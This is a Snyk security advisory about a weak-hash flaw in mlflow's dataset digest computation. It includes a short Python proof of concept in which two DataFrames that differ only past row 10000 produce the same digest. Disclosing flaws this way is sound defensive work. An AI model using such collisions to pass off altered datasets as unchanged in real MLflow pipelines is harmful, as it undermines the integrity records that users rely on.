Use of Weak Hash Affecting mlflow package, versions [0,]


Severity

Recommended
0.0
low
0
10

CVSS assessment by Snyk's Security Team. Learn more

Threat Intelligence

Exploit Maturity
Proof of Concept
EPSS
0.1% (2nd percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications

Snyk Learn

Learn about Use of Weak Hash vulnerabilities in an interactive lesson.

Start learning
  • Snyk IDSNYK-PYTHON-MLFLOW-17173043
  • published5 Jun 2026
  • disclosed4 Jun 2026
  • credit3em0

Introduced: 4 Jun 2026

CVE-2026-10803  (opens in a new tab)
CWE-328  (opens in a new tab)

How to fix?

There is no fixed version for mlflow.

Overview

mlflow is a platform to streamline machine learning development, including tracking experiments, packaging code into reproducible runs, and sharing and deploying models.

Affected versions of this package are vulnerable to Use of Weak Hash in the mlflow.data.digest_utils function. An attacker can compromise data integrity or cause unexpected behavior by exploiting the use of a weak hash algorithm during dataset digest computation.

PoC

import pandas as pd
from mlflow.data.digest_utils import compute_pandas_digest

# Create two datasets differing only in rows beyond 10000
n = 15000
df1 = pd.DataFrame({"a": list(range(n))})
df2 = pd.DataFrame({"a": list(range(10000)) + [999999] * 5000})

print(f"df1 digest: {compute_pandas_digest(df1)}")
print(f"df2 digest: {compute_pandas_digest(df2)}")
print(f"Collision: {compute_pandas_digest(df1) == compute_pandas_digest(df2)}")
# Output: Collision: True (despite 5000 rows being completely different)

CVSS Base Scores

version 4.0
version 3.1